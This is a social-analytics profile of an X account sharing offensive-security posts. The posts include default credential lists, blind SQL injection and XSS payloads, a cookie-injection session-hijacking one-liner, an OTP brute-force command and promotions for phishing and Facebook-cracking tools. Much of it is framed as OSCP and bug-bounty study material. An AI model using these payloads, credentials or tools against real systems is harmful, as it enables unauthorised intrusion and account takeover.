@TheMsterDoctor1 X
X posts on X about bounty, send, injection, so i the most. They currently have [------] followers and [---] posts still getting attention that total [------] engagements in the last [--] hours.
Engagements: [------] #
- [--] Week [------] -37%
- [--] Month [-------] +635%
- [--] Months [-------] +48%
- [--] Year [---------] +324%
Mentions: [--] #
- [--] Months [--] -50%
- [--] Year [--] +50%
Followers: [------] #
- [--] Week [------] +0.76%
- [--] Month [------] +8.80%
- [--] Months [------] +15%
- [--] Year [------] +30%
CreatorRank: [-------] #
Social Influence
Social category influence technology brands 19.05% stocks #3098 social networks 6.67% finance 4.76% celebrities 2.86% premier league 0.95% champions league 0.95% cryptocurrencies 0.95%
Social topic influence bounty 12.38%, send 7.62%, injection 7.62%, so i 7.62%, level #1074, $googl 6.67%, ip 6.67%, testing 6.67%, the world #3571, world of #882
Top accounts mentioned or mentioned by @savetonotion @threadreaderapp @gmailcom @c0d3cr4zy @greenarmor @vspherelocal @keyframes @themsterdoctor1welcometothelinuxprivilegeescalationguidewithinmyoscpoffensivesecuritycertified88bc5d167330 @examplecom @corewarrior @33 @2222 @3333 @12722280 @ssw0rd @tsv @yourhandle @tmpclaimjson @versionburpcollaboratoroastifycomx @xai
Top assets mentioned Alphabet Inc Class A (GOOGL) Dell Technologies, Inc. (DELL)
Top Social Posts
Top posts by engagements in the last [--] hours
"Offensive Security notes π₯π’ Welcome to the Linux Privilege Escalation Guide within my OSCP (Offensive Security Certified Professional) notes. πππ "Access to my OSCP Linux Privilege Escalation notes is limited to a select group. If you'd like to receive these notes please drop a 'Yes' and send me a private direct message. This offer is exclusively for verified users not new accounts." In this comprehensive resource we will explore the intricacies of escalating privileges on Linux systems providing you with the knowledge and techniques necessary to navigate the challenging world of ethical"
X Link 2023-10-18T03:22Z 32.7K followers, 101.4K engagements
"π #ESSENTIALS: Dive into the World of Computer Networking Linux and Cybersecurity π₯π Are you ready to enhance your IT skills Check out these amazing resources and courses: π§ Linux Concept & Admin π Intermediate & Advanced Networking π Cybersecurity Concepts π» Basic Linux System Admin π Key Cybersecurity Concepts π Free Courses and Quality Content: π Professor Messer - Free Course π David Bombal - Free Course π₯ Satyen Kumar - Free Content πΊ Learn Linux TV - Free Course π Digital Security Village and ISC2 Course π₯ Penetration Testing: π΅β Pentest π Concepts & Fundamentals - π"
X Link 2023-10-28T18:31Z 32.7K followers, 74.6K engagements
"π Ready to dive into the world of cybersecurity Check out this fantastic ππππππππππππ π90-Day Cybersecurity Study Plan π ππ» This repository offers a comprehensive roadmap to help you master essential cybersecurity concepts and technologies. With a well-structured plan and abundant resources you're set for success. Get ready to level up your infosec skills πͺπ #Cybersecurity #Hacking #InfoSec #LearnCybersecurity #StudyPlan Explore the plan here: ππ #cybersecurity #hacking #infosec https://github.com/farhanashrafdev/90DaysOfCyberSecurity"
X Link 2023-11-04T07:01Z 32.7K followers, 60.5K engagements
"ππLearn Cyber Security from basic to advanced with Cisco π»π Join me on this exciting journey and let's level up our cybersecurity skills together. Follow me for regular updates and insights. ππ Repo: #CyberSecurity #Hacking #InfoSec #Cisco #LearnCyberSecurity https://mega.nz/folder/B4A0WDZA#zAFQcBE8Fx_Nk5UXW89olg https://mega.nz/folder/B4A0WDZA#zAFQcBE8Fx_Nk5UXW89olg"
X Link 2023-11-05T05:53Z 32.7K followers, 130.3K engagements
"π500 TB Tutorials + Books + Courses + Trainings + Workshops + Educational Resources π πData science πPython πArtificial Intelligence . πAWS Certified . πCloud πBIG DATA πData Analytics πBI πGoogle Cloud Platform πIT Training πMBA πMachine Learning πDeep Learning πEthical Hacking πSPSS πStatistics πData Base πLearning language resources ( English French German ) π£ LINK: https://drive.google.com/drive/mobile/folders/1CgN7DE3pNRNh_4BA_zrrMLqWz6KquwuD https://drive.google.com/drive/mobile/folders/1CgN7DE3pNRNh_4BA_zrrMLqWz6KquwuD"
X Link 2023-11-12T03:12Z 32.7K followers, 859.1K engagements
"Hey hackers I hope this note is bookmarked on your belt It contains awesome pdfs including: Free Offensive Security Notes (OSCP OSWE OSEP OSED) - Red team Operations - Reverse engineering content - Red Team x Blue team - Practical social engineering - Windows Privilege escalation - AD & Road to OSCP - JR to Specialist career - Many Offsec notes - & Many more Thanks to @C0d3Cr4zy #cybersecurity #Pentesting #Hacking #bugbountytips #infosec #cybersecuritytips #redteam #coding #100DaysOfHacking #vulnerabilities #BugBounty #100DaysOfCyberSecurity #CyberSecurityAwareness https://bit.ly/3XqScLM"
X Link 2024-09-03T07:03Z 32.7K followers, 81.9K engagements
"# Default Credentials [--]. Cisco User: cisco Password: cisco [--]. Citrix User: nsroot Password: nsroot [--]. Dell iDRAC User: root Password: calvin [--]. Juniper User: super Password: juniper123 [--]. pfSense User: admin Password: pfsense [--]. SAP User: SAP* Password: [--------] [--]. Tomcat User: tomcat Password: tomcat [--]. UniFi User: ubnt Password: ubnt [--]. Weblogic User: weblogic Password: weblogic1 [--]. Zabbix User: Admin Password: zabbix [--]. Windows User: Administrator Password: P@ssw0rd https://twitter.com/i/web/status/2014194936627769819 https://twitter.com/i/web/status/2014194936627769819"
X Link 2026-01-22T04:34Z 32.7K followers, 250.6K engagements
"π¨ ALL FREE CERTIFICATION RESOURCES π¨ No paywalls. No BS. Just value. π AWS π π CISSP π π‘ CISA π π CISM π β CRISC π π CCDA π π Digital Marketing π π‘ Save this. π Retweet to help others level up. β€ Like so more free drops keep coming. #CyberSecurity #AWS #CISSP #CISA #CISM #CRISC #CCDA #DigitalMarketing #FreeResources #InfoSec https://drive.google.com/drive/mobile/folders/1bOOYEJaNYOzddHQHoKI4tnzKks3BaL-z https://drive.google.com/drive/mobile/folders/17ChJX5uTL-MXOhaZNzYDubELvcJppV https://drive.google.com/drive/mobile/folders/1ThyyDGQUhd1gZD92synPGLwK4v0sugcv"
X Link 2026-01-25T04:14Z 32.7K followers, 165K engagements
"π§ π£ [---] FILES. 200+ GB. ELITE ONLY. I just unlocked a vault that would make even top bug bounty hunters drop everything: π₯ OSCP π₯ OSEP π₯ OSWE π₯ THM / HTB π₯ EC-Council π₯ Cisco CyberOps π₯ Linux Priv Esc π₯ PEN-300 Full Video Series π₯ BloodHound AD SSH API SQL π₯ PEN-300 / HTB / THM π₯ EC-Council / CyberOps / Linux PrivEsc π₯ BloodHound / AD / API / SSH / SQL πΎ FULL videos PDFs labs @GREEN_ARMOR zips Too hot to share publicly. Ill pick ONLY [----] people to send this to we can get banned for this π₯ π Repost + Like + Comment ME Ill DM you if youre chosen. This is NOT your regular course"
X Link 2026-01-31T06:11Z 32.7K followers, 65.5K engagements
"CLAUDE CODE but for HACKING its called shannon you point it at website and it just. tries to break in. fully autonomous with no human needed i pointed it at a test app and it stole the entire user database created admin accounts and bypassed login all by itself in [--] minutes https://github.com/KeygraphHQ/shannon https://github.com/KeygraphHQ/shannon"
X Link 2026-02-07T04:23Z 32.7K followers, 30.9K engagements
"Here are NUCLEAR-GRADE one-liners - maximum damage minimum detection: β‘ EXTREME RECONNAISSANCE [--]. Full Infrastructure Mapping with Passive + Active Intelligence Fusion subfinder -d -all -silent dnsx -silent -resp -a -cname -ptr -txt -mx -soa tee dns.txt awk 'print $1' httpx -silent -td -cdn -csp -fhr -title -server -tech-detect -status-code -content-length -json jq -r 'select(.cdn==false and .status_code=403) .url.tech.title.server @tsv' nuclei -t cves/ -t exposures/ -t vulnerabilities/ -rl [---] -bs [--] -c [--] -silent notify -silent [--]. Autonomous Bug Bounty Hunter (Set & Forget) while true; do"
X Link 2026-02-11T05:29Z 32.7K followers, 12.3K engagements
"π Hack Like a Pro: Extract IPs from Shodan HTML in Seconds π₯ Sick of digging through HTML Let grep do the work π» bash grep -oP '(=strong).*(=/strong)' ip.html ips [--] Save Shodan page source as HTML [--] Run this command [--] BOOM π₯ All IPs extracted to ips Master your toolkit #KaliLinux #HackingTips #CyberSecurity #Shodan #OSINT https://twitter.com/i/web/status/2019651453246124183 https://twitter.com/i/web/status/2019651453246124183"
X Link 2026-02-06T05:56Z 32.7K followers, 15.9K engagements
"9. Session Hijacking via Cookie Injection Across 100+ Subdomains subfinder -d -silent httpx -silent -mc [---] parallel -j [--] "curl -s -H 'Cookie: session=$VICTIM_SESSION; domain=.target.com; path=/' -L grep -i 'welcomedashboard' && echo 'HIJACKED: '" anew hijacked_sessions.txt [--]. Multi-Factor Authentication Bypass via Rate Limit Exploitation seq [------] [------] parallel -j [---] --pipe-part -a /dev/stdin "xargs -I curl -s -X POST -d 'code=&session=$SESSION' -w '%http_coden' grep -E '(200302)$' && echo 'OTP CRACKED: ' tee otp.txt" π INJECTION ATTACKS (EXTREME) [--]. Blind SQL Injection with DNS"
X Link 2026-02-11T05:29Z 32.7K followers, [----] engagements
"Default Credentials (Extended) 12.Apache User: admin Password: admin 13.Apache Tomcat (Manager) User: admin Password: admin EC2 AMI (Linux) User: ec2-user Password: (SSH key only / none) 15.Fortinet FortiGate User: admin Password: (blank) 16.F5 BIG-IP User: admin Password: admin 17.GitLab (fresh install) User: root Password: 5iveLfe 18.Grafana User: admin Password: admin 19.HP iLO User: Administrator Password: admin 20.Jenkins User: admin Password: admin 21.Kubernetes Dashboard (older setups) User: admin Password: admin 22.Magento User: admin Password: admin123 23.Mikrotik RouterOS User:"
X Link 2026-01-23T06:22Z 32.7K followers, 11K engagements
"# Default Credentials - Part [--] π [--]. VMware vCenter User: administrator@vsphere.local Password: Admin23 [--]. Fortinet FortiGate User: admin Password: blank [--]. F5 BIG-IP User: admin Password: admin [--]. Palo Alto Networks User: admin Password: admin [--]. Check Point User: admin Password: admin [--]. Jenkins User: admin Password: password [--]. GitLab User: root Password: 5iveLfe [--]. Grafana User: admin Password: admin [--]. Kibana User: elastic Password: changeme [--]. MongoDB User: admin Password: admin [--]. PostgreSQL User: postgres Password: postgres [--]. Oracle Database User: SYSTEM Password: manager [--]. Redis No"
X Link 2026-01-24T05:44Z 32.7K followers, 32.7K engagements
"200+ Hacking / Infosec pdfs Source: #infosec #Hacking #infosecurity #Malware #bugbountytips #CTF #BugBounty #vulnerability #pwn #CyberSecurityAwareness #CyberSecurity #cybersecuritytips https://drive.google.com/drive/u/0/mobile/folders/12Mvq6kE2HJDwN2CZhEGWizyWt87YunkU https://drive.google.com/drive/u/0/mobile/folders/12Mvq6kE2HJDwN2CZhEGWizyWt87YunkU"
X Link 2026-01-29T15:03Z 32.7K followers, 77.4K engagements
"π Explore a treasure trove of Cyber Security resources ππ₯ Dive into a drive filled with FREE PDFs to enhance your knowledge. Don't miss out on this valuable collection ππ‘ Drive Link: #cybersecurity #hacking #infosecurity https://drive.google.com/drive/mobile/folders/179D_slEOLXWOTeFdmRrMkdV8C4DSLdYT https://drive.google.com/drive/mobile/folders/179D_slEOLXWOTeFdmRrMkdV8C4DSLdYT"
X Link 2026-02-01T15:43Z 32.6K followers, 16.9K engagements
"π¨ FREE LEARNING DROP π¨ If youre preparing for OSCP and want practical lab-focused learning resources without the high cost this is for you π π§ Cybersecurity / OSCP Learning Hubs πΉ πΉ πΉ π 23-in-1 Digital Marketing Masterclass π― SEO Ads Funnels Branding Growth π π Bonus resource folders: π π π₯ Save this π RT to help others π¬ Comment what skill youre learning next #CyberSecurity #OSCP #DigitalMarketing #FreeCourses #InfoSec #LearnOnline #TechTwitter"
X Link 2026-02-01T23:21Z 32.6K followers, 26.1K engagements
"Offensive Security notes π₯π’ Welcome to the Linux Privilege Escalation Guide within my OSCP (Offensive Security Certified Professional) notes. πππ "Access to my OSCP Linux Privilege Escalation notes is limited to a select group. First [-----] people are eligible to receive access to OSCP Notes If you'd like to receive these notes please πfollow me πrepost and drop πYes and send me a private direct message. This offer is exclusively for verified users not new accounts." In this comprehensive resource we will explore the intricacies of escalating privileges on Linux systems providing you"
X Link 2026-02-03T19:02Z 32.6K followers, 17.7K engagements
"Automation isn't always just a Duplicateit's about finding the right bug first. [--]. Advanced Nuclei Commands a) Run Nuclei with Custom Rate-Limits and Threads Optimize performance based on your machine's capacity: nuclei -l newdomains -t /home/kali/nuclei-templates/ -rl [---] -c [--] -o results.txt -rl 150: Rate limit (150 requests per second). -c 50: Number of concurrent threads. b) Enable Debug Mode To get detailed logs for troubleshooting: nuclei -l newdomains -t /home/kali/nuclei-templates/ -debug -o results.txt c) Run Specific Template Categories Run templates for specific types of"
X Link 2026-02-04T06:27Z 32.7K followers, [----] engagements
"UPDATE π§ WAFs blocking your payloads Not anymore. π NextRce v2.2 is out Now featuring a specialized UTF-16LE Encoding Engine to bypass WAF signatures while exploiting CVE-2025-55182. π» The "Ghost Mode" encodes malicious JSON payloads to evade filters but the Next.js server decodes and executes them perfectly. github ; #DevTools #python #bugbountytip #bugbountytips #InfoSec #recon #nextjs #React2Shell https://github.com/ynsmroztas/NextRce https://github.com/ynsmroztas/NextRce"
X Link 2026-02-13T06:03Z 32.7K followers, 18.7K engagements
"This is an engineer from Elon Musks xAI just listen to this guy this how you as a career starter should think @xai GET STUFF DONE β
"
X Link 2026-02-14T05:23Z 32.7K followers, [---] engagements
"π Unlocking the World of Cybersecurity: OSCP Edition π π Ready to elevate your cybersecurity game Look no further π π Meet the Ultimate Master Teacher: OSCP π π What's OSCP you ask It's the Offensive Security Certified Professional a globally recognized certification that puts you on the fast track to becoming a cybersecurity powerhouse πͺ π Dive into the World of OSCP with us: [--] Hands-On Learning: OSCP isn't your typical certification. It's a hands-on real-world challenge that immerses you in the nitty-gritty of penetration testing. Get ready to roll up your sleeves and dive into"
X Link 2023-11-20T09:07Z 32.7K followers, 151.8K engagements
"βTRYHACKME ROADMAP FOR OSCPβ # Level [--] - Intro - OpenVPN - Welcome - Intro to Researching - Learn Linux - Crash Course Pentesting Introductory CTFs to get your feet wet - Google Dorking - OHsint - # Level [--] - Tooling - Tmux - Nmap - Web Scanning - Sublist3r - Metasploit - Hydra - Linux Privesc - Web Scanning More introductory CTFs - Vulnversity - - Blue - - Simple CTF - Bounty Hacker # Level [--] - Crypto & Hashes with CTF practice - Crack the hash - Agent Sudo - The Cod Caper - Ice - Lazy Admin - Basic Pentesting # Level [--] - Web - OWASP top [--] - Inclusion - "
X Link 2023-11-21T10:58Z 32.7K followers, 170.9K engagements
"Burp Suite [---] For Beginners π· #1 - Introduction and Installation: π· #2 - Understanding Navigation Dashboard Configuration: #3 - Exploring Burp Proxy and Target Specification: #4 - Exploring Burp Repeater and Burp Comparer: #5 - Going deep Into intruder: http://hacklido.com/blog/631 http://hacklido.com/blog/628 http://hacklido.com/blog/625 http://hacklido.com/blog/624 http://hacklido.com/blog/621 http://hacklido.com/blog/631 http://hacklido.com/blog/628 http://hacklido.com/blog/625 http://hacklido.com/blog/624 http://hacklido.com/blog/621"
X Link 2023-11-22T17:18Z 32.7K followers, 54.2K engagements
"Free Google IT Certification Courses in 2023: (Bookmark For Later ) [--]. Data Science with Python [--]. Create Image Captioning Models [--]. Encoder-Decoder Architecture [--]. Google Cloud Computing Foundations: Cloud Computing Fundamentals [--]. Introduction to Baseline: Data ML AI [--]. Introduction to Google Cloud Essentials [--]. Google IT Automation with Python [--]. Introduction to Large Language Models [--]. Introduction to Generative AI [--]. Generative AI Fundamentals [--]. Introduction to Responsible AI [--]. Introduction to Image Generation [--]. Attention Mechanism [--]. Transformer Models and BERT Model 15."
X Link 2023-11-23T00:23Z 32.7K followers, 188.2K engagements
"10 websites that will save you hundreds of hours: π Bookmark for later"
X Link 2023-11-24T06:42Z 32.7K followers, 154.4K engagements
"The Art of Web Reconnaissance and Bug Bounty Learning Drive π. Domain Enumeration Port Scanning Vulnerability Scanning Content Discovery Passive Enumeration & More Link: πdecryption key : JRmgMNgy9BqjrVNBq6VyUQ https://mega.nz/folder/Qn5CibIC#JRmgMNgy9BqjrVNBq6VyUQ https://mega.nz/folder/Qn5CibIC#JRmgMNgy9BqjrVNBq6VyUQ"
X Link 2023-11-26T07:24Z 32.7K followers, 61.5K engagements
"Excited to embark on the CEH v11 journey π Ready to dive into the world of ethical hacking and enhance my cybersecurity skills. #CEHv11 #EthicalHacking #Cybersecurity 100% Free For First [----] User's. Simply: [--]. Follow (So I Will Dm) π₯ [--]. Like and Repost [--]. Comment Send to receive your copies π"
X Link 2023-11-27T05:55Z 32.7K followers, 67.6K engagements
"Excited to embark on the CEH v12 journey π Ready to dive into the world of ethical hacking and enhance my cybersecurity skills. #CEHv12 #EthicalHacking #Cybersecurity 100% Free For First [----] User's. Simply: [--]. Follow (So I Will Dm) π₯ [--]. Like and Repost [--]. Comment Send to receive your copies π "I do not own this content. For any issues or concerns please contact the rightful owner directly.""
X Link 2023-11-28T06:40Z 32.7K followers, 56.3K engagements
"π Repositories For OSCP Prepration :: https://github.com/alexiasa/oscp-omnibus https://github.com/burntmybagel/OSCP-Prep https://github.com/CaptBoykin/oscp https://github.com/ssstonebraker/oscp-scripts https://github.com/chvancooten/OSCP-MarkdownReportingTemplates https://github.com/The-Lynx-Team/OSCP https://github.com/superhero1/OSCP-Prep https://github.com/tagnullde/OSCP https://github.com/six2dez/OSCP-Human-Guide https://gist.github.com/unfo/5ddc85671dcf39f877aaf5dce105fac3 https://github.com/DriftSec/AutoRecon-OSCP https://github.com/CyDefUnicorn/OSCP-Archives"
X Link 2023-11-28T21:27Z 32.7K followers, 41.6K engagements
"Offensive Security notes π₯π’ Embarking on the OSCP journey Check out this insightful guide on "How to Pass OSCP Like a Boss". π #OSCP #Cybersecurity #InfoSec #EthicalHacking If you'd like to receive these notes 100% Free For First [----] User's. Simply: [--]. Follow (So I Will Dm) π₯ [--]. Like and Repost [--]. Comment Send to receive your copies π "I do not own this content. For any issues or concerns please contact the rightful owner directly.""
X Link 2023-11-29T06:34Z 32.7K followers, 120.1K engagements
"Enumeration Checklist For OSCP Examπ Windows Privilege Escalation Checklistπ Linux Privilege Escalation Checklistππ ACTIVE DIRECTORY ENUMERATION WITH POWERSHELL π PDF link ππ Simply: [--]. Follow (So I Will Dm) π₯ [--]. Like and Repost [--]. Comment Send to receive your copies π"
X Link 2023-11-30T07:03Z 32.7K followers, 56.8K engagements
"How to Change IP Every [--] seconds On Linux 1.Clone these [--] GitHub Repos :- git clone git clone 2.Then Run this Command sudo apt-get install tor sudo service tor start 3.This is working on linux system Go to this directory and delete the # sign in the lines starting with the control port and hash sudo nano /etc/tor/torrc tor --hash-password write sudo nano /etc/tor/torrc and record the number given to the hashed part. 4.Then Run these commands cd toriptables2 python -l Open the tor switches directory and run it cd tor_ip_switcher python tor_ip_switcher enter the password before you set Set the"
X Link 2023-12-04T09:11Z 32.7K followers, 67.5K engagements
"ππDive into the realm of cybersecurity like never before with the ππRed Team Blueprint a unique guide to ethical hacking mastery. π₯Uncover the secrets of penetration testing and fortify your defenses. Let's explore the world of ethical hacking together π»π Follow meππ If you'd like to receive these courses 100% Free For First [---] User's Simply: [--]. Follow (So I Will Dm) π₯ [--]. Like and Repost [--]. Comment Send to receive your copies π "I do not own this content. For any issues or concerns please contact the rightful owner directly." Share this post to spread the word π #Infosec"
X Link 2023-12-04T09:22Z 32.7K followers, 50.7K engagements
"π#SEARCH ENGINES FOR PENTESTERS [--]. (Server Vulnerabilities) [--]. (Dorks) [--]. (Wifi Networks) [--]. (Codes Search) [--]. (Threat Intelligence) [--]. (Server) [--]. (Threat Intelligence) [--]. (Server) [--]. (Email Addresses) [--]. (Threat Intelligence) [--]. (Threat Intelligence) [--]. (Threat Intelligence) [--]. (OSINT) [--]. (Attack Surface) [--]. (Code Search) [--]. (Threat Intelligence) [--]. (Code Search) [--]. (Attack Surface) [--]. (Threat Intelligence) [--]. (Attack Surface) [--]. (Server) [--]. (Certificate Search) [--]. (Vulnerabilities) [--]. (Threat Intelligence) Share & Support Us β― Channel : dm me for the channel"
X Link 2023-12-05T07:53Z 32.7K followers, 42.5K engagements
"π₯How Hackers Hack CCTV Camerasπ Repo: https://youtu.be/ksUylvdJQDQsi=OpzlZqyW-OsSzoO9 https://youtu.be/ksUylvdJQDQsi=OpzlZqyW-OsSzoO9"
X Link 2023-12-05T22:50Z 32.7K followers, 56.7K engagements
"NucleiFuzzer = Nuclei + Paramspider #Red_Team NucleiFuzzer is a powerful automation tool for detecting xsssqlissrfopen-redirect.etc vulnerabilities in web applications. NucleiFuzzer is an automation tool that combines ParamSpider and Nuclei to enhance web application security testing. It uses ParamSpider to identify potential entry points and Nuclei's templates to scan for vulnerabilities https://github.com/0xKayala/NucleiFuzzer https://github.com/0xKayala/NucleiFuzzer"
X Link 2023-12-08T11:44Z 32.7K followers, 45.9K engagements
"πSome ways to bypass [---] 1- using space symbols exmaple: /admin - [---] /admin%09 - [---] /admin%20 - [---] 2- use traversal Example: /admin - [---] /.;/admin - [---] you can fuzz with traversal sometimes that's end with results Example: /.;/FUZZ #bugbountytips #BugBounty Share & Support Us"
X Link 2023-12-09T11:18Z 32.7K followers, 47.3K engagements
"Telegram: get the IP address of the interlocutor Learn #Telegram #Tools"
X Link 2023-12-12T10:17Z 32.7K followers, 44.8K engagements
"Reverse Engineering and exploit development Download 100% Free For First [----] User's. Simply: [--]. Follow (So I Will Dm) π₯ [--]. Like and Repost [--]. Comment Send to receive your copies π"
X Link 2023-12-12T10:23Z 32.7K followers, 47.8K engagements
"vulnerability checklist This repo contain a lot of vulnerability checklist 1.AEM misconfiguration 2.Authentication 3.IDOR Logic 5.jire vulnerability 6.register vulnerability 7.2FA bypassing 8.admin panal 9.exif vulnerability 10.cookie attack 11.reset password attack 12.Acount takeover checklist [------] bypass checklist from twitter from twitter p [--] 16.Sql injection 17.xss 18.File Upload 19.rate limit Repo: https://github.com/Az0x7/vulnerability-Checklist http://15.tips http://14.tips http://4.Business https://github.com/Az0x7/vulnerability-Checklist http://15.tips http://14.tips"
X Link 2023-12-12T10:25Z 32.7K followers, 34.8K engagements
"π₯ TRYHACKME ROADMAP FOR OSCP π₯ π₯ π₯ π₯π₯π₯π₯π₯π₯π₯π₯π₯π₯ # Level [--] - Intro - OpenVPN - Welcome - Intro to Researching - Learn Linux - Crash Course Pentesting Introductory CTFs to get your feet wet - Google Dorking - OHsint - # Level [--] - Tooling - Tmux - Nmap - Web Scanning - Sublist3r - Metasploit - Hydra - Linux Privesc - Web Scanning More introductory CTFs - Vulnversity - - Blue - - Simple CTF - Bounty Hacker # Level [--] - Crypto & Hashes with CTF practice - Crack the hash - Agent Sudo - The Cod Caper - Ice - Lazy Admin - Basic Pentesting # Level [--] - Web - OWASP"
X Link 2023-12-13T12:03Z 32.7K followers, 72.1K engagements
"π° ABOUT THE TOOL π° This tool is made to hack Facebook. This tool created for hacking multibul facebook accounts useing the facebook api if want to hack a lot of facebook accounts this your tool you can use this tool on any python [---] installed divice like linux windows termux and ish for more information thanks . π° Install with Termux π° apt update apt upgrade pkg install git pkg install python2 git clone cd bash python2 π« DISCLAIMER π« This tool is only for educational purpose β http://termux.sh http://fikrado.py https://github.com/fikrado/fikrado.py http://FIKRADO.PY http://termux.sh"
X Link 2023-12-14T23:57Z 32.7K followers, 47.1K engagements
"The Complete Ethical Hacking Course Beginner to Advanced. "π Excited to announce 'The Complete Ethical Hacking Course - Beginner to Advanced' π Uncover the secrets of cybersecurity master penetration testing and become a pro ethical hacker. π»π‘ Join the cybersecurity revolution #EthicalHacking #Cybersecurity #TechYou" 100% Free For First [----] User's. Simply: [--]. Follow (So I Will Dm) π₯ [--]. Like and Repost [--]. Comment Send to receive your copies π "I do not own this content. For any issues or concerns please contact the rightful owner directly.""
X Link 2023-12-15T08:56Z 32.7K followers, 247.3K engagements
"β΄ WORLD MOST DANGEROUS & POWERFULL HACKERS TOOLS - Pish web tool π Link : - MITM attack tool π Link : - kill shot pentesting framework π Link Facebook Tool Links - Facebook information gathering π Link : git clone - Facebook Toolkit + bots dump private data π Link : - Facebook cracking tool π Link : - Facebook and yahoo account cloner π Link : - Facebook report tool π Link : git clone - Facebook BruteFoRce Tool π Link : - Facebook hacking ASU π Link : git clone - Facebook Downloader π Link : - Hack Facebook MBF π Link : git clone - Facebook Repot3 π Link : git clone - Facebook"
X Link 2023-12-16T06:41Z 32.7K followers, 46.6K engagements
"π ILLEGAL7 HACKERS ALL COURSES π Software cracking π’Advanced software cracking π’Cracker Tools [---] π’Dotnet Software Reverse Engineering And Static Analysis Course π’Ransomware virus course π’Reverse Engineering Course π’Software Cracking Course Size : [----] GB 100% Free For First [----] User's. Simply: [--]. Follow (So I Will Dm) π₯ [--]. Like and Repost [--]. Comment Send to receive your copies π "I do not own this content. For any issues or concerns please contact the rightful owner directly.""
X Link 2023-12-17T05:00Z 32.7K followers, 174.4K engagements
"ππUncover the true IP address of websites safeguarded by Cloudflare https://github.com/spyboy-productions/CloakQuest3r https://github.com/spyboy-productions/CloakQuest3r"
X Link 2023-12-19T10:04Z 32.7K followers, 77.7K engagements
"General Enumeration - Nmap Replace $ip with target IP Initial scan nmap -Pn -n -vvv -oN nmap/initial $ip If no ports are found scan in parts nmap -Pn -n -vvv -p1-500 -oN nmap/partial $ip Scan all ports nmap -Pn -n -vvv -p- -oN nmap/allports $ip Targeted scanning nmap -Pn -n -vvv -p2280 -oN nmap/targeted $ip UDP Scanning sudo nmap -Pn -n -vvv -sU -oN nmap/udp $ip Automated nmap scanning (my preference is nmapAutomator never missed a port) # It is recommended to scan ONE IP at a time # Do NOT overload the network # All scans consecutively: Quick Targeted UDP All ports Vuln scan CVE scan"
X Link 2023-12-21T18:11Z 32.7K followers, 42.5K engagements
"Blind SQL Injection Detection and Exploitation (Cheat Sheet) Payload list: MySQL Blind (Time Based): 0'XOR(if(now()=sysdate()sleep(5)0))XOR'Z 0'XOR(if(now()=sysdate()sleep(51)0))XOR'Z if(now()=sysdate()sleep(5)0) 'XOR(if(now()=sysdate()sleep(5)0))XOR' 'XOR(if(now()=sysdate()sleep(51)0))OR' 0'(IF((now())LIKE(sysdate())SLEEP(1)0))'Z"
X Link 2023-12-22T06:05Z 32.7K followers, 34.9K engagements
"Bug bounty Cheatsheet: XSS SQLi SSRF CRLF CSV-Injection Command Injection Directory Traversal LFI XXE Open-Redirect RCE Crypto Template Injection XSLT Content Injection LDAP Injection NoSQL Injection CSRF Injection GraphQL Injection IDOR ISCM LaTex Injection OAuth XPATH Injection Bypass Upload Tricky https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth"
X Link 2023-12-25T21:01Z 32.7K followers, 36.5K engagements
"Description : Ultimate phishing tool in python. Includes popular websites like facebook twitter instagram github reddit gmail and many others. *Announcement This project is now a part of MaxPhisher. Further bug fixes and feature addition will be available in that + Installation Install dependencies (git python php ssh) For Debian (Ubuntu Kali-Linux Parrot) sudo apt install git python3 python3-pip php openssh-client -y For Arch (Manjaro) sudo pacman -S git python3 python-pip php openssh --noconfirm For Redhat(Fedora) sudo dnf install git python3 php openssh -y For Termux pkg install git"
X Link 2023-12-27T19:18Z 32.7K followers, 37.5K engagements
"π Elevate your cybersecurity skills with these courses: [--] Ethical Hacking From Scratch: [--] folder [--] files [--] Python & Ethical Hacking: [--] folders [--] files [--] Website Hacking & Penetration Testing: [--] folders [---] files [--] Ultimate Dark Web Anonymity Privacy: [--] folders [--] files [--] Learn Hacking Using Android: [--] folders [---] files [--] Network Hacking Continued: [--] folders [---] files [--] Learn Network Hacking From Scratch: [--] folders [--] file [--] Learn Social Engineering From Scratch: folders [---] files [--] Learn Wi-Fi Password Penetration Testing: [--] folders [--] files π ARP Spoofing & Man In The Middle(MITM): 2"
X Link 2023-12-30T01:21Z 32.7K followers, 122.5K engagements
"Quick tip to find reflected xss: 1- python3 --domain 2- cat kxss grep " " tee unfiltered_param.txt 3- inject simple xss payload: "img src=x onerror=alert("XSS") - Payloads π° style@keyframes abanimation:a;/styleb/onanimationstart=prompt$document.domain` marquee+loop=1+width=0+onfinish='new+Functionalert1' d3v/onauxclick=2.some(confirm)click x onauxclick=a=alerta(domain)click q=1" type=image src=x oneror="alert (alert') --svg+onload=%27top%2fal%2f%2esource%2b%2fert%2f%2esource(document.cookie)%27 (Chrome only) id=1&id=2 input value="12" id="&id=onpointerrawupdate="a=confirm&id=a(1) input"
X Link 2024-01-05T04:09Z 32.7K followers, 67.8K engagements
"Bug Bounty Tips IDOR Steps to Reproduce 1.Go to https://example.com/ 2.Go to vendor login. 3.Make one attacker account and one victim account. 4.Login as attacker. 5.Go to My Account. 6.Update your profile and intercept your request with burp suite make sure your foxy proxy is on you will notice this request take a look at userId parameter and save it your notepad: 7.Change email to new email: example I changed to this email: exa@gmail.com or to exa2@gmail.com 8.But make sure you created victim account. So change it to the victim email. 9.Before you change your email make sure to turn your"
X Link 2024-01-07T14:33Z 32.7K followers, 43K engagements
"Bounty Tips Collected From Twitterββ"
X Link 2024-01-08T14:40Z 32.7K followers, 36K engagements
"πPenetration Testing Beginner To Expert Massive Web Application Penetration Testing & Bug Bounty Notesπ github: #web #pentest https://github.com/xalgord/Massive-Web-Application-Penetration-Testing-Bug-Bounty-Notes.git https://github.com/xalgord/Massive-Web-Application-Penetration-Testing-Bug-Bounty-Notes.git"
X Link 2024-01-09T05:12Z 32.7K followers, 23.1K engagements
